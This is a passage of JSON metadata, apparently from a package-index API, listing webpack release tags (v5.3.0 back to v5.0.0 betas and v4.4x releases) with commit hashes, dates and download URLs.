tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7